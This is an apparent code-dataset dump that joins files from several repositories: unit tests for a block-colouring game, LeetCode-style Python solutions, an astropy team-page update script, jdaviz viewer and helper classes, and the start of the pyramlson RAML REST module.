[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]]]
def test_flatten_33() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[0], COLOUR_LIST[0]]]
def test_parimete_goal_34() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
goal_1 = PerimeterGoal(COLOUR_LIST[3])
assert goal_1.score(board) == 5
goal_2 = PerimeterGoal(COLOUR_LIST[0])
assert goal_2.score(board) == 6
goal_3 = PerimeterGoal(COLOUR_LIST[1])
assert goal_3.score(board) == 1
goal_4 = PerimeterGoal(COLOUR_LIST[2])
assert goal_4.score(board) == 4
def test_parimete_goal_35() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], None]
set_children(board.children[3], colours2)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[3], colours3)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 28
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 6
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 10
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 20
def test_parimeter_goal_36() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 4
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 8
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 4
def test_parimeter_goal_37() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 2)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 0
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 16
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
def test_parimeter_goal_38() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 8
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 0
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
def test_parimeter_goal_39() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 0)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 0
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 4
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
# TODO: ~~~~~~ TASK 7 ~~~~~~ ~~~~~~ TASK 7 ~~~~~~ ~~~~~~ TASK 7 ~~~~~~
def test_blob_40() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
flatten_board_1 = _flatten(board)
visited_1 = [[-1, -1], [-1, -1]]
goal_1 = BlobGoal(COLOUR_LIST[0])
assert goal_1._undiscovered_blob_size((3, 4), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((3, 2), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 0), flatten_board_1, visited_1) == 4
assert goal_1._undiscovered_blob_size((0, 1), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 1), flatten_board_1, visited_1) == 0
assert goal_1.score(board) == 4
assert visited_1[0][0] == 1
assert visited_1[0][1] == 1
assert visited_1[1][0] == 1
assert visited_1[1][1] == 1
flatten_board_2 = _flatten(board)
visited_2 = [[-1, -1], [-1, -1]]
goal_2 = BlobGoal(COLOUR_LIST[1])
assert goal_2._undiscovered_blob_size((3, 4), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((9, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 1), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 0), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 1), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_1, visited_2) == 0
assert goal_2.score(board) == 0
assert visited_2[0][0] == 0
assert visited_2[1][0] == 0
assert visited_2[0][1] == 0
assert visited_2[1][1] == 0
flatten_board_3 = _flatten(board)
visited_3 = [[-1, -1], [-1, -1]]
goal_3 = BlobGoal(COLOUR_LIST[2])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((2, -1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_1, visited_3) == 0
assert goal_3.score(board) == 0
assert visited_3[0][0] == 0
assert visited_3[0][1] == 0
assert visited_3[1][1] == 0
assert visited_3[1][0] == 0
flatten_board_4 = _flatten(board)
visited_4 = [[-1, -1], [-1, -1]]
goal_4 = BlobGoal(COLOUR_LIST[3])
assert goal_4._undiscovered_blob_size((3, 4), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((-2, 0), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 0), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((0, 0), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((0, 1), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 0), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 1), flatten_board_1, visited_4) == 0
assert goal_4.score(board) == 0
assert visited_4[0][0] == 0
assert visited_4[0][1] == 0
assert visited_4[1][1] == 0
assert visited_4[1][0] == 0
def test_blob_41() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 0)
flatten_board_1 = _flatten(board)
visited_1 = [[-1]]
goal_1 = BlobGoal(COLOUR_LIST[0])
assert goal_1._undiscovered_blob_size((3, 4), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((3, 2), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 0), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 1), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 0), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 1), flatten_board_1, visited_1) == 0
assert goal_1.score(board) == 0
assert visited_1[0][0] == 0
flatten_board_2 = _flatten(board)
visited_2 = [[-1]]
goal_2 = BlobGoal(COLOUR_LIST[1])
assert goal_2._undiscovered_blob_size((3, 4), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((-1, 2), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 1), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 1), flatten_board_2, visited_2) == 0
assert goal_2.score(board) == 0
assert visited_2[0][0] == 0
flatten_board_3 = _flatten(board)
visited_3 = [[-1]]
goal_3 = BlobGoal(COLOUR_LIST[2])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((-1, 2), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 1
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_3, visited_3) == 0
assert goal_3.score(board) == 1
assert visited_3[0][0] == 1
flatten_board_3 = _flatten(board)
visited_3 = [[-1]]
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((-1, 2), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_3, visited_3) == 0
assert goal_3.score(board) == 0
assert visited_3[0][0] == 0
def test_blob_42() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], None]
set_children(board.children[3], colours2)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[3], colours3)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 80
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 16
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 16
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 64
def test_blob_43() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 5
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 1
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 1
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 4
def test_blob_44() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 4
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 0
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 4
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 4
def test_blob_45() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours = [COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 16
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 0
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 32
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 16
def test_blob_46() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [None, None, None, None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[0], COLOUR_LIST[0], None, COLOUR_LIST[3]]
set_children(board.children[0], colours1)
colours_5 = [None, COLOUR_LIST[2], COLOUR_LIST[2], None]
set_children(board.children[1], colours_5)
colours_6 = [None, None, COLOUR_LIST[1], None]
set_children(board.children[2], colours_6)
colours_7 = [None, None, COLOUR_LIST[1], None]
set_children(board.children[3], colours_7)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], None, COLOUR_LIST[3]]
set_children(board.children[0].children[2], colours3)
colours_8 = [COLOUR_LIST[0], COLOUR_LIST[2], COLOUR_LIST[3], COLOUR_LIST[1]]
set_children(board.children[1].children[0], colours_8)
colours_9 = [None, COLOUR_LIST[2], COLOUR_LIST[3], COLOUR_LIST[1]]
set_children(board.children[1].children[3], colours_9)
colours_10 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[2].children[0], colours_10)
colours_11 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]]
set_children(board.children[2].children[1], colours_11)
colours_12 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[2].children[3], colours_12)
colours_13 = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[3]]
set_children(board.children[3].children[0], colours_13)
colours_14 = [COLOUR_LIST[3], None, COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[1], colours_14)
colours_15 = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[3].children[3], colours_15)
#level 4
colours4 = [COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]]
set_children(board.children[0].children[2].children[2], colours4)
colours_16 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1]]
set_children(board.children[1].children[3].children[0], colours_16)
colours_17 = [COLOUR_LIST[0], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[3].children[1].children[1], colours_17)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 44
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 40
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 49
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 42
# TODO: ~~~~~~ TASK 8 ~~~~~~ ~~~~~~ TASK 8 ~~~~~~ ~~~~~~ TASK 8 ~~~~~~
def test_create_player_47() -> None:
a = create_players(3, 2, [1, 3, 2])
assert len(a) == 8
assert a[0].id == 0
assert a[4].id == 4
assert a[7].id == 7
assert isinstance(a[1], HumanPlayer)
assert isinstance(a[2], HumanPlayer)
assert isinstance(a[3], RandomPlayer)
assert isinstance(a[5], SmartPlayer)
assert isinstance(a[7], SmartPlayer)
def test_create_player_48() -> None:
a = create_players(0, 0, [])
assert len(a) == 0
def test_create_player_49() -> None:
a = create_players(9, 10, [])
assert len(a) == 19
assert a[4].id == 4
assert isinstance(a[4], HumanPlayer)
assert isinstance(a[8], HumanPlayer)
assert isinstance(a[9], RandomPlayer)
if __name__ == '__main__':
pytest.main(['unit_test.py'])
```
|
{
"source": "jenndryden/coding-challenges",
"score": 3
}
|
#### File: coding-challenges/171-excel-sheet-column-number/171-excel-sheet-column-number.py
```python
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
multiplier = 1
output = 0
for i in range(len(columnTitle)-1,-1,-1):
output += (ord(columnTitle[i])-64) * multiplier
multiplier *= 26
return output
```
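A quick sanity check of the base-26 conversion above (a hedged sketch; assumes the `Solution` class from this file is available):
```python
s = Solution()
assert s.titleToNumber("A") == 1     # single letter
assert s.titleToNumber("Z") == 26
assert s.titleToNumber("AB") == 28   # 1*26 + 2
assert s.titleToNumber("ZY") == 701  # 26*26 + 25
```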
#### File: coding-challenges/202-happy-number/202-happy-number.py
```python
class Solution:
def isHappy(self, n: int) -> bool:
seen = {}
while True:
if n in seen:
break
counter = 0
for i in range(len(str(n))):
counter += int(str(n)[i]) ** 2
seen[n] = 1
n = counter
counter = 0
            if n == 1:
                return True
return False
```
#### File: coding-challenges/35-search-insert-position/35-search-insert-position.py
```python
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
start = 0
end = len(nums) - 1
while start <= end:
middle = (start + end) // 2
if nums[middle] == target:
return middle
if nums[middle]>target:
end = middle - 1
else:
start = middle + 1
return start
```
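A hedged sketch exercising the binary search above (assumes the `Solution` class from this file and LeetCode's `List` import):
```python
s = Solution()
assert s.searchInsert([1, 3, 5, 6], 5) == 2  # target found at index 2
assert s.searchInsert([1, 3, 5, 6], 2) == 1  # would be inserted before 3
assert s.searchInsert([1, 3, 5, 6], 7) == 4  # appended at the end
```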
#### File: coding-challenges/53-maximum-subarray/53-maximum-subarray.py
```python
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
curr_sum = 0
max_sum = nums[0]
for n in nums:
if curr_sum < 0:
curr_sum = 0
curr_sum += n
max_sum = max(max_sum, curr_sum)
return max_sum
```
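The solution above is Kadane's algorithm: reset the running sum whenever it drops below zero and keep the best sum seen so far. A hedged sketch exercising it (assumes the `Solution` class from this file):
```python
s = Solution()
assert s.maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6  # best slice is [4, -1, 2, 1]
assert s.maxSubArray([-3, -1, -2]) == -1                    # all-negative input
```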
#### File: coding-challenges/56-merge-intervals/56-merge-intervals.py
```python
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
intervals.sort(key=lambda x: x[0])
final = []
curr_start = intervals[0][0]
curr_end = intervals[0][1]
for interval in intervals:
if interval[0] <= curr_end:
curr_end = max(interval[1], curr_end)
else:
final.append([curr_start, curr_end])
curr_start = interval[0]
curr_end = interval[1]
final.append([curr_start, curr_end])
return final
```
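A hedged sketch exercising the interval merge above (assumes the `Solution` class from this file):
```python
s = Solution()
assert s.merge([[1, 3], [2, 6], [8, 10], [15, 18]]) == [[1, 6], [8, 10], [15, 18]]
assert s.merge([[1, 4], [4, 5]]) == [[1, 5]]  # touching intervals are merged
```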
#### File: coding-challenges/94-binary-tree-inorder-traversal/94-binary-tree-inorder-traversal.py
```python
class Solution:
def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:
numbers = []
def helper(node):
if node:
helper(node.left)
numbers.append(node.val)
helper(node.right)
helper(root)
return numbers
```
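On LeetCode, `TreeNode`, `Optional`, and `List` are pre-defined; outside that environment a minimal stand-in is needed. A hedged sketch exercising the traversal above:
```python
# Minimal stand-in for LeetCode's TreeNode, only for this sketch.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

root = TreeNode(1, right=TreeNode(2, left=TreeNode(3)))
assert Solution().inorderTraversal(root) == [1, 3, 2]  # left, node, right
```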
|
{
"source": "Jenneh/astropy.github.com",
"score": 3
}
|
#### File: Jenneh/astropy.github.com/getteam.py
```python
from __future__ import print_function
def get_astropy_credits(warner=print):
"""
Looks for the ``credits.rst`` file in the astropy repo and returns it, or
returns False if the repo can't be found.
"""
import os
from urllib.request import urlopen
creditspath = os.environ.get('ASTROPY_REPO_PATH', 'http://raw.github.com/astropy/astropy/main/docs/credits.rst')
if creditspath.startswith('http'):
#url - download page from web
u = None
try:
u = urlopen(creditspath)
return u.read()
except Exception as e:
            warner('Could not download credits.rst from "{0}": {1}. Using placeholder for "The Team" page.'.format(creditspath, e))
return False
finally:
if u is not None:
u.close()
else:
if not os.path.isfile(creditspath):
warner('Credits.rst file at "{0}" is not a file! Using placeholder for "The Team" page.'.format(creditspath))
return False
with open(creditspath) as f:
return f.read()
def extract_names_list(docs, sectionname, warner=print):
from docutils import nodes
from docutils.core import publish_doctree
if not isinstance(docs, nodes.document):
docs = publish_doctree(docs)
assert isinstance(docs, nodes.document)
foundsections = []
for c in docs.children:
titleidx = c.first_child_matching_class(nodes.title)
if titleidx is not None:
title = str(c.children[titleidx].children[0])
if title == sectionname:
section = c
break
else:
foundsections.append(title)
else:
warner("No section found with name {0}. Sections are:{1!s}".format(sectionname, foundsections))
return None
listidx = section.first_child_matching_class(nodes.bullet_list)
litems = section.children[listidx].children
names = []
for litem in litems:
names.append(''.join(litem.traverse(lambda n: isinstance(n, nodes.Text))))
return names
def process_html(fn, newcoordinators, newcontributors, indent='\t\t\t'):
"""
Returns a string of html mean to look like the input, but with content from
the credits file.
"""
lines = []
incoord = incontrib = False
with open(fn) as fr:
for l in fr:
if l.endswith('\n'):
l = l[:-1] # strip newline
if incoord:
if '</ul>' in l:
lines.extend([(indent + '<li>' + c + '</li>') for c in newcoordinators])
lines.append(l)
incoord = False
#skip otherwise
elif incontrib:
if '</ul>' in l:
lines.extend([(indent + '<li>' + c + '</li>') for c in newcontributors])
lines.append(l)
incontrib = False
else:
if '<ul class="team">' in l:
lines.append(l)
#skip otherwise
else:
if '<ul class="coordinators">' in l:
incoord = True
elif '<h3 id="core-package-contributors">' in l:
incontrib = True
lines.append(l)
return '\n'.join(lines)
if __name__ == '__main__':
from docutils.core import publish_doctree
dt = publish_doctree(get_astropy_credits())
coordinators = extract_names_list(dt, 'Astropy Project Coordinators')
contributors = extract_names_list(dt, 'Core Package Contributors')
newhtml = process_html('team.html', coordinators, contributors)
print('Replacing "team.html" with updated version. Be sure to "git diff '
'team.html" before committing to ensure no funny business happened.')
with open('team.html', 'wb') as f:
f.write(newhtml.encode('UTF-8'))
```
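A minimal sketch of `extract_names_list` on a hand-written credits document (assumes docutils is installed; the section titles mirror the ones the script looks for, the names are made up):
```python
rst = """
The Team
========

Astropy Project Coordinators
----------------------------

* Alice Example
* Bob Example

Core Package Contributors
-------------------------

* Carol Example
"""
print(extract_names_list(rst, 'Astropy Project Coordinators'))
# expected: ['Alice Example', 'Bob Example']
```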
|
{
"source": "Jenneh/jdaviz",
"score": 2
}
|
#### File: mosviz/plugins/viewers.py
```python
from glue.core import BaseData
from glue_jupyter.bqplot.image import BqplotImageView
from glue_jupyter.bqplot.profile import BqplotProfileView
from specutils import Spectrum1D
from jdaviz.core.registries import viewer_registry
__all__ = ['MOSVizProfileView', 'MOSVizImageView']
@viewer_registry("mosviz-profile-viewer", label="Profile 1D (MOSViz)")
class MOSVizProfileView(BqplotProfileView):
default_class = Spectrum1D
def data(self, cls=None):
return [layer_state.layer.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
@viewer_registry("mosviz-image-viewer", label="Image 2D (MOSViz)")
class MOSVizImageView(BqplotImageView):
default_class = None
def data(self, cls=None):
return [layer_state.layer #.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
```
#### File: configs/specviz/helper.py
```python
import pathlib
import uuid
import astropy.units as u
from specutils import Spectrum1D, SpectrumCollection, SpectralRegion
from jdaviz.core.helpers import ConfigHelper
class SpecViz(ConfigHelper):
"""SpecViz Helper class"""
_default_configuration = 'specviz'
def load_data(self, data, data_label=None, format=None):
"""
Loads a data file or `~specutils.Spectrum1D` object into SpecViz.
Parameters
----------
data : str or `~specutils.Spectrum1D`
Spectrum1D spectra, or path to compatible data file.
data_label : str
The Glue data label found in the ``DataCollection``.
format : str
Loader format specification used to indicate data format in
`~specutils.Spectrum1D.read` io method.
"""
# If no data label is assigned, give it a unique identifier
if data_label is None:
data_label = "specviz_data|" + uuid.uuid4().hex
# If data provided is a path, try opening into a Spectrum1D object
try:
path = pathlib.Path(data)
if path.is_file():
data = Spectrum1D.read(path, format=format)
else:
                raise FileNotFoundError("No such file: " + str(path))
# If not, it must be a Spectrum1D object. Otherwise, it's unsupported
except TypeError:
if type(data) is SpectrumCollection:
raise TypeError("`SpectrumCollection` detected. Please "
"provide a `Spectrum1D`.")
elif type(data) is not Spectrum1D:
raise TypeError("Data is not a Spectrum1D object or compatible file")
self.app.add_data(data, data_label)
self.app.add_data_to_viewer('spectrum-viewer', data_label)
def get_spectra(self):
"""Returns the current data loaded into the main viewer"""
return self.app.get_data_from_viewer('spectrum-viewer')
def get_spectral_regions(self):
"""
Retrieves glue subset objects from the spectrum viewer and converts
them to `~specutils.SpectralRegion` objects.
Returns
-------
spec_regs : dict
Mapping from the names of the subsets to the subsets expressed
as `specutils.SpectralRegion` objects.
"""
regions = self.app.get_subsets_from_viewer('spectrum-viewer')
spec_regs = {}
for name, reg in regions.items():
unit = reg.meta.get('spectral_axis_unit', u.Unit('Angstrom'))
spec_reg = SpectralRegion.from_center(reg.center.x * unit,
reg.width * unit)
spec_regs[name] = spec_reg
return spec_regs
```
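A hedged usage sketch of the helper above, intended for a notebook session; the file name is hypothetical and the exact import path depends on how the package re-exports the class:
```python
from jdaviz.configs.specviz.helper import SpecViz

specviz = SpecViz()
specviz.load_data('my_spectrum.fits', data_label='demo')  # or pass a Spectrum1D directly
spectra = specviz.get_spectra()            # data currently shown in the spectrum viewer
regions = specviz.get_spectral_regions()   # glue subsets as specutils SpectralRegion objects
```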
#### File: specviz/plugins/viewers.py
```python
from glue.core import BaseData
from glue_jupyter.bqplot.profile import BqplotProfileView
from specutils import Spectrum1D
from jdaviz.core.registries import viewer_registry
__all__ = ['SpecvizProfileView']
@viewer_registry("specviz-profile-viewer", label="Profile 1D (Specviz)")
class SpecvizProfileView(BqplotProfileView):
default_class = Spectrum1D
def data(self, cls=None):
return [layer_state.layer.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
```
#### File: jdaviz/jdaviz/utils.py
```python
import os
from traitlets import Unicode
__all__ = ['load_template']
def load_template(file_name, path=None, traitlet=True):
"""
Load a vue template file and instantiate the appropriate traitlet object.
Parameters
----------
file_name : str
The name of the template file.
    path : str
        Path to a file whose directory contains the template, typically the
        ``__file__`` of the calling module; the template is looked up in
        ``os.path.dirname(path)``.
    traitlet : bool
        If `True` (the default), wrap the template in a `Unicode` traitlet,
        otherwise return the raw template string.
Returns
-------
`Unicode`
The traitlet object used to hold the vue code.
"""
path = os.path.dirname(path)
with open(os.path.join(path, file_name)) as f:
TEMPLATE = f.read()
if traitlet:
return Unicode(TEMPLATE)
return TEMPLATE
```
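A hedged sketch of how `load_template` is typically called from a plugin module; the ``.vue`` file name is hypothetical:
```python
from jdaviz.utils import load_template

# The template file is looked up next to the module that passes its own __file__.
template = load_template("my_widget.vue", __file__)                       # a Unicode traitlet
template_str = load_template("my_widget.vue", __file__, traitlet=False)   # raw string
```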
|
{
"source": "jenner/pyramlson",
"score": 2
}
|
#### File: pyramlson/pyramlson/__init__.py
```python
import re
import os
import logging
from email.utils import parsedate
from inspect import getmembers
from collections import namedtuple, defaultdict
import venusian
from pyramid.path import (
AssetResolver,
DottedNameResolver
)
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPInternalServerError,
HTTPNoContent,
)
from pyramid.interfaces import IExceptionResponse
from pyramid.settings import asbool
from .apidef import IRamlApiDefinition
from .utils import (
prepare_json_body,
render_mime_view,
render_view,
validate_and_convert
)
LOG = logging.getLogger(__name__)
DEFAULT_METHOD_MAP = {
'get': 200,
'post': 200,
'put': 201,
'delete': 204,
'options': 200,
'patch': 200,
}
MethodRestConfig = namedtuple('MethodRestConfig', [
'http_method',
'permission',
'returns'
])
MARKER = object()
class NoMethodFoundError(Exception):
""" Raised when no matching method(s) for a service could be found """
class api_method(object):
# pylint: disable=invalid-name
def __init__(self, http_method, permission=None, returns=None):
"""Configure a resource method corresponding with a RAML resource path
This decorator must be used to declare REST resources.
:param http_method: The HTTP method this method maps to.
:param permission: Permission for this method.
:param returns: A custom HTTP code to return in case of success.
Configure the HTTP code to return when the method call was successful.
        By default the return code is expected to match the configured HTTP method:
- GET/POST/PATCH: 200
- PUT: 201
- DELETE: 204
"""
self.http_method = http_method
self.permission = permission
